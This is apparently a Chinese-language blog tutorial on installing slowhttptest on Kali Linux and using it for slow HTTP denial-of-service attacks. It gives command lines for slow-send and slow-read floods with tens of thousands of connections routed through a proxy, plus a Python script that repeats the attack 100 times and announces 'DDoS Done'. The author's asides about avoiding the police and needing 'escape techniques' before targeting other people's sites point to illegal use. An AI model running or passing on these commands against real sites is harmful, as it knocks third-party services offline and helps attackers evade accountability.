slowhttptest是一款Web壓力測試軟件,比LOIC牛逼多了,接下來我將介紹這款工具的安裝和基本使用,高級的方法大家可以參考幫助和文檔;
這種教程只能寫得隱晦點,怕被查水錶。。。
1:首先安裝支持環境:libssl-dev,這裏建立把工具安裝在kali下面,因爲kali集成了很多環境,不用我們自己再一個個安裝。
圖1-1.
2:通過git下載文件.
圖1-2.
3:./configure運行環境檢查腳本。
圖1-3.
注意:如果遇到運行configure顯示配置選項爲NO的,表示環境沒有安裝,apt-get install 逐個安裝即可。
4:運行make命令,然後運行make install命令。
注意:如果運行make命令提示報錯,估計就是你的環境沒安裝好,安裝下面的包應該可以解決。
4.1:使用apt-get update更新源
4.2:安裝以下的包:
autotools-dev
automake
autoconf2.13
m4
perl
libperl5.14
5:全部安裝好之後運行slowhttptest命令,成功則會顯示下圖的界面。
圖1-4.
6:使用方法:
實例1:
slowhttptest -X -u url -l 60 -c 65539
-X 慢速攻擊,向服務器慢速發送數據包造成堵塞
-l 持續攻擊時間
-c 向服務器發起的連接數,限制爲65539
-u 目標網址
實例2:
slowhttptest -c 1000 -X -g -o slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -e 117.90.137.34:9000 -u url -p 3
-g:生成帶有套接字狀態更改的統計信息(off)
-o:文件前綴保存文件中的統計輸出;html和文件;csv(需要參數g)
-r:連接速率/秒(50)
-w:窗口開始的大小,範圍從1開始,後跟bytes
-y: 窗口結束的大小,範圍到512結束,後跟是bytes
-n:在1秒之中從recv緩衝區讀取操作的間隔
-z:用單個read()調用來從接收緩衝區中緩慢讀取字節,後跟字節
-k:在連接中重複相同請求的次數。如果服務器支持持久連接(1),那麼使用響應大小相乘
-p:檢測連接上等待HTTP響應的超時,在此參數後服務器被認爲是不可訪問的(5)
-e: 使用http代理流量
、
圖1-5.
最後冒死發一波福利。
用Python實現自動化“測試”!
#!usr/bin/python
import os
'slowhttptest.py -- author:replaceroot'
for i in range(100):
os.system("slowhttptest -X -e 123.123.123.123:123 -u http://www.test.com/ -l 60 -c 65539")
print '\n\033[34;1m[Done]\033[0mDDoS Done...'
溫馨提醒:建議自己用虛擬機搭環境測試,沒有強大的自信和逃逸技術,不要拿別人網站測試!